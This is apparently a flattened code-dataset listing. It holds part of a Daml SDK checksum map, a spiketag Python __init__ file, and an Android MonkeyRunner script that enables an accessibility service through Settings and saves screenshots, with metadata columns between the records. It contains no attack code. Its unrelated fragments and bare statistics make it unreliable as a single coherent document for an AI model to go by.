"macos": "f49dd3f5198d3392b81bd64067f697bc0d18612fe9599a50580d57d1dd9c721c",
"windows": "c2ec9b51f7d4e44309d73f1ee9eb4919eac5c80452782b97d76251a0c283f596",
"test_tool": "f5b5024d7173e7f56b1d2ca57c8ee0b4a107208cd9d15f27f9ab1737ecfc33a4",
"daml_types": "142e7094081a95f202e0a5eaf72a15df724c2b9aa5e83bd22e4c544705de967e",
"daml_ledger": "15041d0be63f1781b9d036481093f49d56071078a4e826a862de921b5a806d93",
"daml_react": "3dabcccd1d4c13637cc096c401606f777f90368a4057dc7220269f8101aa1888",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.2.0": {
"linux": "3920012a013d2b162f1328addaaf6c8f322f0473c1f681146fa748039f838a77",
"macos": "2f0e39f864b288de7a8b55996916452c3226669054423ee921660eb3a3467b9f",
"windows": "0df31d5dda5a23ad48c0201135c0611881bdc49d7f5ecbf31fce24d2129e9626",
"test_tool": "7c41476ec2fff62b0b588f07cd7496b5fde8fcdb440a48d539041ac3df7141d6",
"daml_types": "339591a0213d33d55f73fc10f33edd8e7f3d1f6a7b560a0abddb5510e5fe9c26",
"daml_ledger": "873452dce84fab87b456b1da1d9d5bc2a74cf4c6f3c6872e409a1b4c3dd170f1",
"daml_react": "bb58c2c51befe75f7f50a4ccf90bd9ed2593cdfff6ac1c9a98e0a80f5dbf82f7",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.3.0": {
"linux": "556975da1fa4ac2f4c44825a1518f4ee01e6ba2de3f6dcc70ec24f9d13f2689a",
"macos": "43cb5b1c98115e1ddb7a4fe5ab629a2090cbbf177a5715d533dca76824552f9d",
"windows": "a2318e6b95a718028b65d1e84ee6aadcd1252ae78e0fce335ac2f0a903051eee",
"test_tool": "5fe64257452bece53d88fcb4d9dbe4f472f7f7e12c4a571ac39796ce47e8527f",
"daml_types": "41cdc3d0a9448869470054d3d9d0ea71c40309893e94474074369d1709a65676",
"daml_ledger": "acd6499ea37c5cfe069a9461dd1ab425293df166eed8085ee913e80e9a188510",
"daml_react": "a192c3b51faacaf95efc250442f7c6be4ae5ad227cf07f661f49c06548302b67",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.4.0": {
"linux": "28883d87c6b6780e6d13ef88ed4b6131135b2293520c2da143094744c112646f",
"macos": "2be95a05a6c7f67de1cc1cfa605d6d518c32b63c9893dfaa2558d3e9a7dfc70b",
"windows": "f8449378fb572f93ba4c3ef7716e69f5ddbdc60a9b7b1a4aeab2a867954bcac4",
"test_tool": "04aa064be948a9a1e88456c9fe0eaafe9d1e6280930039a5570b61df42c00129",
"daml_types": "cc47d4576c85eac5840c8733bd702304c282bb656603a6c621ea701d106e9ede",
"daml_ledger": "f112eac6597a0787008cf995894ab9bbe8e5f0e39a699e22f02c36080d88b12d",
"daml_react": "d7e50c4d94424e3f25df716105d00c4eb945f2709282a548ae93f250e306fc9c",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.5.0": {
"linux": "a9f92e5e773c8984e1ccf305dc96e254a1c73a1427626e3fd315066d6f4545e4",
"macos": "0e8e571d2a50c4e0a305e2c98c510a2b2272583a0c0bc48df7050b7196e827de",
"windows": "2eec0144ffedbdad069dfc49187daf72e94f12b2d27b66443b63d6244967dedd",
"test_tool": "539260ae20afbcc67f50e359a31a4a7f808d0b5fec6417b8cd6c73eefba4b13c",
"daml_types": "389fdf6aa51c7610986327cf2e9e02fe7bb91a5845692b4db32c73c67355f5d5",
"daml_ledger": "6fb560a8a482b6ddef30eef66e1e55e964fd7b9749ac5e9eceb3a98c51722d1d",
"daml_react": "2d7572e009fa10b1ca430e28a9d18cd60b6299ecb75f4a000967fb1322c2edb2",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.6.0-snapshot.20200908.5166.0.1623baec": {
"linux": "9ef0dadc4f0a73a67a5f232e3b772621cc2a0bdfb52d0d7526d54918d2a84623",
"macos": "94e12f7a44a4d54ecd8e468c12bd4fdeb0c50d964cbfe5ab4d22a712ff8b50f7",
"windows": "cb4455fb9aca17a72981204f221fc7fb3b50deab3979713dd42197173c6b98e5",
"test_tool": "ec69bd4d936e05d847ccfbbf8f09904365eea05c77a9cf3787245942a0cb71be",
"daml_types": "0f8fe04ca10befd8e00db9fb2c4c3bb934c26104f66f662815a7a065bb51d533",
"daml_ledger": "ec96ac50a665758b3ab029e4500888375ac05cc52aca5b2b1465821c0b3ee4bd",
"daml_react": "5a09dbb578c3e3307e51d776ce226dcb702ea8268267e360b080501c81313844",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
"1.6.0-snapshot.20200915.5208.0.09014dc6": {
"linux": "e9c14e30ce8c637d8c5759b1b8af4b53ff1318b9cc01bf5bbb48d60c4c50db46",
"macos": "bd1e38d798b64a16390fc242c7e67ddf1610e493f360afd97e31fe50377a940f",
"windows": "d7d3ba4e66cad4ac8a9204a459a854b529631595242a000128c13068d71b4b78",
"test_tool": "f416d8feb765a55d63109e7e6c81038cc5ea1216a8f0662fb6cbb25cf274f087",
"daml_types": "dcb127364c91ac8797d3c6fc852d9e87f11213abbe60317570b7644c586e6fac",
"daml_ledger": "649d191c758eb947324fe40f20df18ba2305abe5133be4c90e97834701691405",
"daml_react": "2e4080f2160daf2c86308a90c24077394f4893383145910ea0fdd6bb7afea891",
"create_daml_app_patch": "b187d446443209288c165cf34247307275b497e015a5d953805297c05279d856",
},
}
| 56.861538
| 100
| 0.77151
| 387
| 7,392
| 14.573643
| 0.330749
| 0.006383
| 0.005319
| 0.02234
| 0.153014
| 0.138475
| 0.07961
| 0.07961
| 0.072163
| 0.039184
| 0
| 0.489378
| 0.133929
| 7,392
| 129
| 101
| 57.302326
| 0.391596
| 0.032197
| 0
| 0.28
| 1
| 0
| 0.774094
| 0.679955
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bec2a13b68868423b30d4224bd6f231aeb978464
| 193
|
py
|
Python
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 4
|
2018-04-23T18:08:39.000Z
|
2020-03-10T19:06:28.000Z
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 69
|
2017-02-17T19:27:52.000Z
|
2022-03-30T04:06:53.000Z
|
spiketag/analysis/__init__.py
|
chongxi/spiketag
|
d27bc9553936c5f9c8a5b71dedcf701987a5b77b
|
[
"BSD-3-Clause"
] | 5
|
2017-02-01T16:11:32.000Z
|
2021-02-05T20:10:43.000Z
|
from .place_field import place_field
from .place_field import info_bits, info_sparcity
from .core import *
from .decoder import Decoder, NaiveBayes, load_decoder
from .core import spike_binning
| 38.6
| 54
| 0.839378
| 29
| 193
| 5.344828
| 0.448276
| 0.193548
| 0.180645
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11399
| 193
| 5
| 55
| 38.6
| 0.906433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fe62ddfa5f0ed189462c015e81d130ef5ff3fe42
| 2,657
|
py
|
Python
|
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
code/turn-on-access-service.py
|
fogies/docker-android-accessibility-capture
|
f07f675325dbeedbea4d3ef824f0558b61b29738
|
[
"Apache-2.0"
] | null | null | null |
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
import time, sys

# MonkeyRunner script (runs under Jython) that drives the Android Settings
# app to enable an accessibility service, capturing a screenshot after each
# navigation step into <logsdir>/accessSettings/<count>AccessScreen.png.
#
# Usage: monkeyrunner turn-on-access-service.py <logsdir>

device = MonkeyRunner.waitForConnection()
logsdir = sys.argv[1]
count = 1


def capture_screen():
    # Snapshot the current screen, save it under a sequential name, and
    # advance the counter. The logged path now matches the file actually
    # written (the original printed "...Screen.png" but wrote
    # "...AccessScreen.png").
    global count
    dest = './' + logsdir + '/accessSettings/' + str(count) + 'AccessScreen.png'
    print("writing to : " + dest)
    shot = device.takeSnapshot()
    shot.writeToFile(dest, 'png')
    count = count + 1


def press_and_wait(keycode, seconds):
    # Send a single key press (down+up) and give the UI time to settle.
    device.press(keycode, MonkeyDevice.DOWN_AND_UP)
    time.sleep(seconds)


# Open the Settings app and wait for it to render.
device.startActivity(component='com.android.settings/.Settings')
time.sleep(6)
capture_screen()

# Navigate down to the Accessibility entry, capturing each step.
press_and_wait('KEYCODE_DPAD_DOWN', 6)
capture_screen()
press_and_wait('KEYCODE_DPAD_DOWN', 6)
capture_screen()

# Enter the Accessibility settings screen.
press_and_wait('KEYCODE_ENTER', 10)
capture_screen()

# Tab to the target service and open it.
press_and_wait('KEYCODE_TAB', 6)
press_and_wait('KEYCODE_TAB', 6)
press_and_wait('KEYCODE_ENTER', 15)
capture_screen()

# Tab through the toggle/confirmation controls, capturing each step.
press_and_wait('KEYCODE_TAB', 6)
capture_screen()
press_and_wait('KEYCODE_TAB', 6)
capture_screen()

# Confirm enabling the service and capture the final state.
press_and_wait('KEYCODE_ENTER', 10)
capture_screen()
| 42.854839
| 91
| 0.765149
| 329
| 2,657
| 6.091185
| 0.12766
| 0.167665
| 0.191617
| 0.231537
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0.881737
| 0
| 0.009091
| 0.047798
| 2,657
| 62
| 92
| 42.854839
| 0.783004
| 0.013549
| 0
| 0.862069
| 0
| 0
| 0.294163
| 0.011446
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.034483
| null | null | 0.137931
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.